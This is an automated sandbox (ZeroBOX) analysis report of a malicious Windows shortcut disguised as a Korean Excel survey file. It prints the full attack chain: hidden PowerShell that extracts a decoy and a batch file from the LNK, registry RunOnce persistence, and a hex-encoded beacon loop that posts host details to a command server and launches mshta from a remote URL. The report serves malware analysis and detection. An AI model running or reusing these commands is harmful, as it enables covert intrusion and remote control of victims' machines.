Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Aug. 14, 2023, 9:04 a.m.	Aug. 14, 2023, 9:06 a.m.

Size	24.8MB
Type	MS Windows shortcut, Item id list present, Points to a file or directory, Has command line arguments, Icon number=0, Archive, ctime=Mon Feb 13 22:52:35 2023, mtime=Tue May 9 17:28:46 2023, atime=Mon Feb 13 22:52:35 2023, length=245248, window=hide
MD5	`0eb8db3cbde470407f942fd63afe42b8`
SHA256	`a39831ecbe0792adf87f63fb99557356ba688e5f6da8c2b058d2a3d0f0d7d1e4`
CRC32	`26C7E313`
ssdeep	`384:8+8+ba0vH3XVgL/mYIDm/QuG/bSbiNsvidDTn1VhGiplDQpB+H:pbXvEtIiQuGTUiSaVcw`
Yara	Lnk_Format_Zero - LNK Format Generic_Malware_Zero - Generic Malware

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "GQRGkj" C:\Users\test22\AppData\Local\Temp\현황조사표.xlsx.lnk
2556
- cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c powershell -windowstyle hidden $pEbjEn = Get-Location;if($pEbjEn -Match 'System32' -or $pEbjEn -Match 'Program Files') {$pEbjEn = 'C:\Users\test22\AppData\Local\Temp'};$lyHWPSj = Get-ChildItem -Path $pEbjEn -Recurse *.lnk ^| where-object {$_.length -eq 0x18C0000} ^| Select-Object -ExpandProperty FullName;if($lyHWPSj.GetType() -Match 'Object'){$lyHWPSj = $lyHWPSj[0];};$lyHWPSj;$C5ytw = gc $lyHWPSj -Encoding Byte -TotalCount 74240 -ReadCount 74240;$tyxkEP = 'C:\Users\test22\AppData\Local\Temp\현황조사표.xlsx';sc $tyxkEP ([byte[]]($C5ytw ^| select -Skip 62464)) -Encoding Byte; ^& $tyxkEP;$Cbe1yj = gc $lyHWPSj -Encoding Byte -TotalCount 79888 -ReadCount 79888;$WH9lSPHOFI = 'C:\Users\test22\AppData\Local\Temp\PMmVvG56FLC9y.bat';sc $WH9lSPHOFI ([byte[]]($Cbe1yj ^| select -Skip 74342)) -Encoding Byte;^& C:\Windows\SysWOW64\cmd.exe /c $WH9lSPHOFI;
  2652
  - powershell.exe powershell -windowstyle hidden $pEbjEn = Get-Location;if($pEbjEn -Match 'System32' -or $pEbjEn -Match 'Program Files') {$pEbjEn = 'C:\Users\test22\AppData\Local\Temp'};$lyHWPSj = Get-ChildItem -Path $pEbjEn -Recurse *.lnk | where-object {$_.length -eq 0x18C0000} | Select-Object -ExpandProperty FullName;if($lyHWPSj.GetType() -Match 'Object'){$lyHWPSj = $lyHWPSj[0];};$lyHWPSj;$C5ytw = gc $lyHWPSj -Encoding Byte -TotalCount 74240 -ReadCount 74240;$tyxkEP = 'C:\Users\test22\AppData\Local\Temp\현황조사표.xlsx';sc $tyxkEP ([byte[]]($C5ytw | select -Skip 62464)) -Encoding Byte; & $tyxkEP;$Cbe1yj = gc $lyHWPSj -Encoding Byte -TotalCount 79888 -ReadCount 79888;$WH9lSPHOFI = 'C:\Users\test22\AppData\Local\Temp\PMmVvG56FLC9y.bat';sc $WH9lSPHOFI ([byte[]]($Cbe1yj | select -Skip 74342)) -Encoding Byte;& C:\Windows\SysWOW64\cmd.exe /c $WH9lSPHOFI;
    2764
    - EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e
      2876
    - cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\PMmVvG56FLC9y.bat
      2992
      - reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /v BackupUserProfiles /t REG_SZ /f /d "C:\Windows\SysWOW64\cmd.exe /c C:\Users\test22\AppData\Roaming\Microsoft\Protect\UserProfileSafeBackup.bat"
        3036
      - cmd.exe C:\Windows\SysWOW64\cmd.exe /c powershell -windowstyle hidden -command "$m6drsidu ="$jWHmcU="""53746172742D536C656570202D5365636F6E64732036373B0D0A246E76536B6C55626151203D2031303234202A20313032343B0D0A247969786773465679203D2024656E763A434F4D50555445524E414D45202B20272D27202B2024656E763A555345524E414D452B272D5348273B0D0A24615777203D2027687474703A2F2F37352E3131392E3133362E3230372F636F6E6669672F62617365732F636F6E6669672E70687027202B20273F553D27202B202479697867734656793B0D0A24624C6D6F69667148774A786845203D2024656E763A54454D50202B20272F4B734B273B0D0A696620282128546573742D506174682024624C6D6F69667148774A7868452929207B0D0A204E65772D4974656D50726F7065727479202D506174682022484B43553A5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E4F6E636522202D4E616D65204F6C6D202D56616C75652027633A5C77696E646F77735C73797374656D33325C636D642E657865202F6320506F7765725368656C6C2E657865202D57696E646F775374796C652068696464656E202D4E6F4C6F676F202D4E6F6E496E746572616374697665202D6570206279706173732070696E67202D6E2031202D772033313137313420322E322E322E32207C7C206D7368746120687474703A2F2F6269616E303135312E6361666532342E636F6D2F61646D696E2F626F6172642F312E68746D6C27202D50726F70657274795479706520537472696E67202D466F7263653B0D0A7D0D0A0D0A66756E6374696F6E207576415828245A547864482C202443725A79667375615042597A290D0A7B0D0A20202020246E464B467258484B465651726F4B203D205B53797374656D2E546578742E456E636F64696E675D3A3A555446382E4765744279746573282443725A79667375615042597A293B0D0A202020205B53797374656D2E4E65742E48747470576562526571756573745D2024526E7A67717143203D205B53797374656D2E4E65742E576562526571756573745D3A3A43726561746528245A54786448293B0D0A2020202024526E7A677171432E4D6574686F64203D2027504F5354273B0D0A2020202024526E7A677171432E436F6E74656E7454797065203D20276170706C69636174696F6E2F782D7777772D666F726D2D75726C656E636F646564273B0D0A2020202024526E7A677171432E436F6E74656E744C656E677468203D20246E464B467258484B465651726F4B2E4C656E6774683B0D0A2020202024624C6D6F69667148774A78684555203D2024526E7A677171432E4765745265717565737453747265616D28293B0D0A2020202024624C6D6F69667148774A786845552E577269746528246E464B467258484B465651726F4B2C20302C20246E464B467258484B465651726F4B2E4C656E677468293B0D0A2020202024624C6D6F69667148774A786845552E466C75736828293B0D0A2020202024624C6D6F69667148774A786845552E436C6F736528293B0D0A202020205B53797374656D2E4E65742E48747470576562526573706F6E73655D20245845577742203D2024526E7A677171432E476574526573706F6E736528293B0D0A2020202024464F4F46467A6777564948203D204E65772D4F626A6563742053797374656D2E494F2E53747265616D526561646572282458455777422E476574526573706F6E736553747265616D2829293B0D0A2020202024624C6D6F69667148774A786845554C54203D2024464F4F46467A67775649482E52656164546F456E6428293B0D0A2020202072657475726E2024624C6D6F69667148774A786845554C543B0D0A7D0D0A646F0D0A7B0D0A202020205472797B0D0A2020202020202020246F7A69517575203D207576415820246157772027273B0D0A202020202020202049662028246F7A69517575202D6E6520276E756C6C27202D616E6420246F7A69517575202D6E65202727290D0A20202020202020207B0D0A202020202020202020202020246F7A695175753D246F7A695175752E537562537472696E6728312C20246F7A695175752E4C656E677468202D2032293B0D0A202020202020202020202020246250435A7562724A466F63203D205B53797374656D2E546578742E456E636F64696E675D3A3A555446382E476574537472696E67285B53797374656D2E436F6E766572745D3A3A46726F6D426173653634537472696E6728246F7A6951757529293B0D0A20202020202020202020202069662028246250435A7562724A466F63290D0A2020202020202020202020207B0D0A2020202020202020202020202020202069662028246250435A7562724A466F632E436F6E7461696E732827726567656469743A2729290D0A202020202020202020202020202020207B0D0A2020202020202020202020202020202020202020246D6274447643656E74784B3D246250435A7562724A466F632E537562537472696E672838293B0D0A202020202020202020202020202020202020202024436861724172726179203D246D6274447643656E74784B2E53706C697428277C7C27293B0D0A202020202020202020202020202020202020202069662028244368617241727261792E4C656E677468202D65712035290D0A20202020202020202020202020202020202020207B0D0A2020202020202020202020202020202020202020202020204E65772D4974656D50726F7065727479202D5061746820244368617241727261795B305D202D4E616D6520244368617241727261795B325D202D56616C756520244368617241727261795B345D202D50726F70657274795479706520537472696E67202D466F7263653B0D0A202020202020202020202020202020202020202020202020244372724B684E464F4E46474B203D2027523D27202B205B53797374656D2E436F6E766572745D3A3A546F426173653634537472696E67285B53797374656D2E546578742E456E636F64696E675D3A3A555446382E47657442797465732827454F462729293B0D0A20202020202020202020202020202020202020202020202075764158202461577720244372724B684E464F4E46474B3B0D0A20202020202020202020202020202020202020207D0D0A202020202020202020202020202020207D0D0A202020202020202020202020202020202020202020202020207D0D0A20202020202020207D0D0A202020207D2043617463687B7D0D0A7D7768696C65282474727565202D6571202474727565290D0A2020202053746172742D536C656570202D5365636F6E647320353B""";$nj4KKFFRe="""""";for($xlEKy9tdBWJ=0;$xlEKy9tdBWJ -le $jWHmcU.Length-2;$xlEKy9tdBWJ=$xlEKy9tdBWJ+2){$dYaD=$jWHmcU[$xlEKy9tdBWJ]+$jWHmcU[$xlEKy9tdBWJ+1];$nj4KKFFRe= $nj4KKFFRe+[char]([convert]::toint16($dYaD,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($nj4KKFFRe));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($m6drsidu));"
        1216
        
        powershell.exe powershell -windowstyle hidden -command "$m6drsidu ="$jWHmcU="""53746172742D536C656570202D5365636F6E64732036373B0D0A246E76536B6C55626151203D2031303234202A20313032343B0D0A247969786773465679203D2024656E763A434F4D50555445524E414D45202B20272D27202B2024656E763A555345524E414D452B272D5348273B0D0A24615777203D2027687474703A2F2F37352E3131392E3133362E3230372F636F6E6669672F62617365732F636F6E6669672E70687027202B20273F553D27202B202479697867734656793B0D0A24624C6D6F69667148774A786845203D2024656E763A54454D50202B20272F4B734B273B0D0A696620282128546573742D506174682024624C6D6F69667148774A7868452929207B0D0A204E65772D4974656D50726F7065727479202D506174682022484B43553A5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E4F6E636522202D4E616D65204F6C6D202D56616C75652027633A5C77696E646F77735C73797374656D33325C636D642E657865202F6320506F7765725368656C6C2E657865202D57696E646F775374796C652068696464656E202D4E6F4C6F676F202D4E6F6E496E746572616374697665202D6570206279706173732070696E67202D6E2031202D772033313137313420322E322E322E32207C7C206D7368746120687474703A2F2F6269616E303135312E6361666532342E636F6D2F61646D696E2F626F6172642F312E68746D6C27202D50726F70657274795479706520537472696E67202D466F7263653B0D0A7D0D0A0D0A66756E6374696F6E207576415828245A547864482C202443725A79667375615042597A290D0A7B0D0A20202020246E464B467258484B465651726F4B203D205B53797374656D2E546578742E456E636F64696E675D3A3A555446382E4765744279746573282443725A79667375615042597A293B0D0A202020205B53797374656D2E4E65742E48747470576562526571756573745D2024526E7A67717143203D205B53797374656D2E4E65742E576562526571756573745D3A3A43726561746528245A54786448293B0D0A2020202024526E7A677171432E4D6574686F64203D2027504F5354273B0D0A2020202024526E7A677171432E436F6E74656E7454797065203D20276170706C69636174696F6E2F782D7777772D666F726D2D75726C656E636F646564273B0D0A2020202024526E7A677171432E436F6E74656E744C656E677468203D20246E464B467258484B465651726F4B2E4C656E6774683B0D0A2020202024624C6D6F69667148774A78684555203D2024526E7A677171432E4765745265717565737453747265616D28293B0D0A2020202024624C6D6F69667148774A786845552E577269746528246E464B467258484B465651726F4B2C20302C20246E464B467258484B465651726F4B2E4C656E677468293B0D0A2020202024624C6D6F69667148774A786845552E466C75736828293B0D0A2020202024624C6D6F69667148774A786845552E436C6F736528293B0D0A202020205B53797374656D2E4E65742E48747470576562526573706F6E73655D20245845577742203D2024526E7A677171432E476574526573706F6E736528293B0D0A2020202024464F4F46467A6777564948203D204E65772D4F626A6563742053797374656D2E494F2E53747265616D526561646572282458455777422E476574526573706F6E736553747265616D2829293B0D0A2020202024624C6D6F69667148774A786845554C54203D2024464F4F46467A67775649482E52656164546F456E6428293B0D0A2020202072657475726E2024624C6D6F69667148774A786845554C543B0D0A7D0D0A646F0D0A7B0D0A202020205472797B0D0A2020202020202020246F7A69517575203D207576415820246157772027273B0D0A202020202020202049662028246F7A69517575202D6E6520276E756C6C27202D616E6420246F7A69517575202D6E65202727290D0A20202020202020207B0D0A202020202020202020202020246F7A695175753D246F7A695175752E537562537472696E6728312C20246F7A695175752E4C656E677468202D2032293B0D0A202020202020202020202020246250435A7562724A466F63203D205B53797374656D2E546578742E456E636F64696E675D3A3A555446382E476574537472696E67285B53797374656D2E436F6E766572745D3A3A46726F6D426173653634537472696E6728246F7A6951757529293B0D0A20202020202020202020202069662028246250435A7562724A466F63290D0A2020202020202020202020207B0D0A2020202020202020202020202020202069662028246250435A7562724A466F632E436F6E7461696E732827726567656469743A2729290D0A202020202020202020202020202020207B0D0A2020202020202020202020202020202020202020246D6274447643656E74784B3D246250435A7562724A466F632E537562537472696E672838293B0D0A202020202020202020202020202020202020202024436861724172726179203D246D6274447643656E74784B2E53706C697428277C7C27293B0D0A202020202020202020202020202020202020202069662028244368617241727261792E4C656E677468202D65712035290D0A20202020202020202020202020202020202020207B0D0A2020202020202020202020202020202020202020202020204E65772D4974656D50726F7065727479202D5061746820244368617241727261795B305D202D4E616D6520244368617241727261795B325D202D56616C756520244368617241727261795B345D202D50726F70657274795479706520537472696E67202D466F7263653B0D0A202020202020202020202020202020202020202020202020244372724B684E464F4E46474B203D2027523D27202B205B53797374656D2E436F6E766572745D3A3A546F426173653634537472696E67285B53797374656D2E546578742E456E636F64696E675D3A3A555446382E47657442797465732827454F462729293B0D0A20202020202020202020202020202020202020202020202075764158202461577720244372724B684E464F4E46474B3B0D0A20202020202020202020202020202020202020207D0D0A202020202020202020202020202020207D0D0A202020202020202020202020202020202020202020202020207D0D0A20202020202020207D0D0A202020207D2043617463687B7D0D0A7D7768696C65282474727565202D6571202474727565290D0A2020202053746172742D536C656570202D5365636F6E647320353B""";$nj4KKFFRe="""""";for($xlEKy9tdBWJ=0;$xlEKy9tdBWJ -le $jWHmcU.Length-2;$xlEKy9tdBWJ=$xlEKy9tdBWJ+2){$dYaD=$jWHmcU[$xlEKy9tdBWJ]+$jWHmcU[$xlEKy9tdBWJ+1];$nj4KKFFRe= $nj4KKFFRe+[char]([convert]::toint16($dYaD,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($nj4KKFFRe));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($m6drsidu));"
        2108

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
75.119.136.207	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (13 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 14, 2023, 9:04 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 14, 2023, 9:04 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 14, 2023, 9:04 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 14, 2023, 9:04 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 14, 2023, 9:04 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 14, 2023, 9:04 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 14, 2023, 9:04 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 14, 2023, 9:04 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 14, 2023, 9:04 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 14, 2023, 9:04 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 14, 2023, 9:04 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 14, 2023, 9:04 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 14, 2023, 9:05 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 14, 2023, 9:04 a.m.			0	0
IsDebuggerPresent Aug. 14, 2023, 9:04 a.m.			0	0

Command line console output was observed (22 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 14, 2023, 9:04 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\현황조사표.xlsx.lnk console_handle: 0x00000013	1	1
WriteConsoleW Aug. 14, 2023, 9:04 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Aug. 14, 2023, 9:04 a.m.	buffer: copy console_handle: 0x00000007	1	1
WriteConsoleW Aug. 14, 2023, 9:04 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\PMmVvG56FLC9y.bat "C:\Users\test22\AppData\Roaming\Microsoft\Protect\UserProfileSafeBackup.bat" console_handle: 0x00000007	1	1
WriteConsoleW Aug. 14, 2023, 9:04 a.m.	buffer: 1 file(s) copied. console_handle: 0x00000007	1	1
WriteConsoleW Aug. 14, 2023, 9:04 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Aug. 14, 2023, 9:04 a.m.	buffer: REG console_handle: 0x00000007	1	1
WriteConsoleW Aug. 14, 2023, 9:04 a.m.	buffer: ADD HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /v BackupUserProfiles /t REG_SZ /f /d "C:\Windows\SysWOW64\cmd.exe /c C:\Users\test22\AppData\Roaming\Microsoft\Protect\UserProfileSafeBackup.bat" console_handle: 0x00000007	1	1
WriteConsoleW Aug. 14, 2023, 9:04 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Aug. 14, 2023, 9:04 a.m.	buffer: start console_handle: 0x00000007	1	1
WriteConsoleW Aug. 14, 2023, 9:04 a.m.	buffer: /min C:\Windows\SysWOW64\cmd.exe /c powershell -windowstyle hidden -command "$m6drsidu ="$jWHmcU="""53746172742D536C656570202D5365636F6E64732036373B0D0A246E76536B6C55626151203D2031303234202A20313032343B0D0A247969786773465679203D2024656E763A434F4D50555445524E414D45202B20272D27202B2024656E763A555345524E414D452B272D5348273B0D0A24615777203D2027687474703A2F2F37352E3131392E3133362E3230372F636F6E6669672F62617365732F636F6E6669672E70687027202B20273F553D27202B202479697867734656793B0D0A24624C6D6F69667148774A786845203D2024656E763A54454D50202B20272F4B734B273B0D0A696620282128546573742D506174682024624C6D6F69667148774A7868452929207B0D0A204E65772D4974656D50726F7065727479202D506174682022484B43553A5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E4F6E636522202D4E616D65204F6C6D202D56616C75652027633A5C77696E646F77735C73797374656D33325C636D642E657865202F6320506F7765725368656C6C2E657865202D57696E646F775374796C652068696464656E202D4E6F4C6F676F202D4E6F6E496E746572616374697665202D6570206279706173732070696E67202D6E2031202D772033313137313420322E322E322E32207C7C206D7368746120687474703A2F2F6269616E303135312E6361666532342E636F6D2F61646D696E2F626F6172642F312E68746D6C27202D50726F70657274795479706520537472696E67202D466F7263653B0D0A7D0D0A0D0A66756E6374696F6E207576415828245A547864482C202443725A79667375615042597A290D0A7B0D0A20202020246E464B467258484B465651726F4B203D205B53797374656D2E546578742E456E636F64696E675D3A3A555446382E4765744279746573282443725A79667375615042597A293B0D0A202020205B53797374656D2E4E65742E48747470576562526571756573745D2024526E7A67717143203D205B53797374656D2E4E65742E576562526571756573745D3A3A43726561746528245A54786448293B0D0A2020202024526E7A677171432E4D6574686F64203D2027504F5354273B0D0A2020202024526E7A677171432E436F6E74656E7454797065203D20276170706C69636174696F6E2F782D7777772D666F726D2D75726C656E636F646564273B0D0A2020202024526E7A677171432E436F6E74656E744C656E677468203D20246E464B467258484B465651726F4B2E4C656E6774683B0D0A2020202024624C6D6F69667148774A78684555203D2024526E7A677171432E4765745265717565737453747265616D28293B0D0A2020202024624C6D6F69667148774A786845552E577269746528246E464B467258484B465651726F4B2C20302C20246E464B467258484B465651726F4B2E4C656E677468293B0D0A2020202024624C6D6F69667148774A786845552E466C75736828293B0D0A2020202024624C6D6F69667148774A786845552E436C6F736528293B0D0A202020205B53797374656D2E4E65742E48747470576562526573706F6E73655D20245845577742203D2024526E7A677171432E476574526573706F6E736528293B0D0A2020202024464F4F46467A6777564948203D204E65772D4F626A6563742053797374656D2E494F2E53747265616D526561646572282458455777422E476574526573706F6E736553747265616D2829293B0D0A2020202024624C6D6F69667148774A786845554C54203D2024464F4F46467A67775649482E52656164546F456E6428293B0D0A2020202072657475726E2024624C6D6F69667148774A786845554C543B0D0A7D0D0A646F0D0A7B0D0A202020205472797B0D0A2020202020202020246F7A69517575203D207576415820246157772027273B0D0A202020202020202049662028246F7A69517575202D6E6520276E756C6C27202D616E6420246F7A69517575202D6E65202727290D0A20202020202020207B0D0A202020202020202020202020246F7A695175753D246F7A695175752E537562537472696E6728312C20246F7A695175752E4C656E677468202D2032293B0D0A202020202020202020202020246250435A7562724A466F63203D205B53797374656D2E546578742E456E636F64696E675D3A3A555446382E476574537472696E67285B53797374656D2E436F6E766572745D3A3A46726F6D426173653634537472696E6728246F7A6951757529293B0D0A20202020202020202020202069662028246250435A7562724A466F63290D0A2020202020202020202020207B0D0A2020202020202020202020202020202069662028246250435A7562724A466F632E436F6E7461696E732827726567656469743A2729290D0A202020202020202020202020202020207B0D0A2020202020202020202020202020202020202020246D6274447643656E74784B3D246250435A7562724A466F632E537562537472696E672838293B0D0A202020202020202020202020202020202020202024436861724172726179203D246D6274447643656E74784B2E53706C697428277C7C27293B0D0A202020202020202020202020202020202020202069662028244368617241727261792E4C656E677468202D65712035290D0A20202020202020202020202020202020202020207B0D0A2020202020202020202020202020202020202020202020204E65772D4974656D50726F7065727479202D5061746820244368617241727261795B305D202D4E616D6520244368617241727261795B325D202D56616C756520244368617241727261795B345D202D50726F70657274795479706520537472696E67202D466F7263653B0D0A202020202020202020202020202020202020202020202020244372724B684E464F4E46474B203D2027523D27202B205B53797374656D2E436F6E766572745D3A3A546F426173653634537472696E67285B53797374656D2E546578742E456E636F64696E675D3A3A555446382E47657442797465732827454F462729293B0D0A20202020202020202020202020202020202020202020202075764158202461577720244372724B684E464F4E46474B3B0D0A20202020202020202020202020202020202020207D0D0A202020202020202020202020202020207D0D0A202020202020202020202020202020202020202020202020207D0D0A20202020202020207D0D0A202020207D2043617463687B7D0D0A7D7768696C65282474727565202D6571202474727565290D0A2020202053746172742D536C656570202D5365636F6E647320353B""";$nj4KKFFRe="""""";for($xlEKy9tdBWJ=0;$xlEKy9tdBWJ -le $jWHmcU.Length-2;$xlEKy9tdBWJ=$xlEKy9tdBWJ+2){$dYaD=$jWHmcU[$xlEKy9tdBWJ]+$jWHmcU[$xlEKy9tdBWJ+1];$nj4KKFFRe= $nj4KKFFRe+[char]([convert]::toint16($dYaD,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($nj4KKFFRe));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($m6drsidu));" console_handle: 0x00000007	1	1
WriteConsoleW Aug. 14, 2023, 9:04 a.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW Aug. 14, 2023, 9:05 a.m.	buffer: PSPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\M console_handle: 0x00000017	1	1
WriteConsoleW Aug. 14, 2023, 9:05 a.m.	buffer: icrosoft\Windows\CurrentVersion\RunOnce console_handle: 0x0000001b	1	1
WriteConsoleW Aug. 14, 2023, 9:05 a.m.	buffer: PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\M console_handle: 0x0000001f	1	1
WriteConsoleW Aug. 14, 2023, 9:05 a.m.	buffer: icrosoft\Windows\CurrentVersion console_handle: 0x00000023	1	1
WriteConsoleW Aug. 14, 2023, 9:05 a.m.	buffer: PSChildName : RunOnce console_handle: 0x00000027	1	1
WriteConsoleW Aug. 14, 2023, 9:05 a.m.	buffer: PSDrive : HKCU console_handle: 0x0000002b	1	1
WriteConsoleW Aug. 14, 2023, 9:05 a.m.	buffer: PSProvider : Microsoft.PowerShell.Core\Registry console_handle: 0x0000002f	1	1
WriteConsoleW Aug. 14, 2023, 9:05 a.m.	buffer: Olm : c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidde console_handle: 0x00000033	1	1
WriteConsoleW Aug. 14, 2023, 9:05 a.m.	buffer: n -NoLogo -NonInteractive -ep bypass ping -n 1 -w 311714 2.2.2.2 console_handle: 0x00000037	1	1
WriteConsoleW Aug. 14, 2023, 9:05 a.m.	buffer: \|\| mshta http://bian0151.cafe24.com/admin/board/1.html console_handle: 0x0000003b	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 91 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053ce20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d3e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d3e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d3e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d720 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d720 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d720 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d720 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d720 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d720 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d2a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d2a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d2a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d3e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d3e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d3e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053cee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d3e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d3e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d3e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d3e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d3e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d3e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d3e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053caa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053caa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053caa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053caa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053caa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
